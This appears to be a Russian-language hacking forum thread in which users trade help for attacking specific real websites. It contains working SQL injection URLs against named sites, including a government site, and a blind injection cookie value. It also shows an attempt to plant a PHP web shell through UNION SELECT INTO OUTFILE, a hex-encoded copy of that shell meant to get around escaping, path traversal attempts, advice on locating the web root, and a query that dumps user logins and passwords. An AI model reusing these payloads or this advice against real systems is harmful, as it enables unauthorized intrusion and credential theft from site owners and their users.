Byrger, не поверишь! Я писал пост так: Но вывелось: PHP: SELECT * FROM users WHERE link = 'admin' and '1'='1 Кавычка пропала, баг форума... Юзай: Code: SELECT * FROM users WHERE link = 'admin' and '1'='1
Народ буду благодарен тому кто мне подскажет как можно обойти вот это Code: http://www.mk.gov.kz/?lang=kaz&id_open_rubric=469
www.xxxxx.com/watch/922/ashot/ Blind SQL Injection Attack details Cookie input RNLBSERVERID was set to -1" or "49"="49 подскажите с чего начать
Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
Название скрипта подозрительное. Думаю кроме раскрытия путей ничего не получишь. OxoTnik, я не думаю, что картинки инклудят.
Говорю же- только картинки... пробовал достать банально robots.txt, ноль эффекта... решил спросить, может обходные пути есть
Помогите залить шелл,пробовал так,не получаутся http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'<? system($_GET[cmd]); ?>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+into+outfile+'/var/www/html/PHPscripts/a.html'--
А так и не получится. Ибо или magic_quotes On либо слеширование вида use near '\'test\',5,6,7. Как минимум ищите скрипты где не происходит слеширование (используются не GPC массивы и тп) и поиск phpmyadmin PS. Прежде чем делать что-либо , потрудитесь изучить теорию хотябы в минимуме. Изза слеширования вставляются доп символы в sql запрос и он становится некорректным
попробуй перевести в HEX <? system($_GET[cmd]); ?> получится так Code: 0x3c3f2073797374656d28245f4745545b636d645d293b203f3e хотя не получится
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига) В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
Почему я немогу зайти на сайт вводя любые из этих данных? http://www.sotovip.biz/phone.php?id=573+and+1=0+UNION+SELECT+1,group_concat(0x2,id,0x2,login,0x2,pass,0x2)+from+users+--+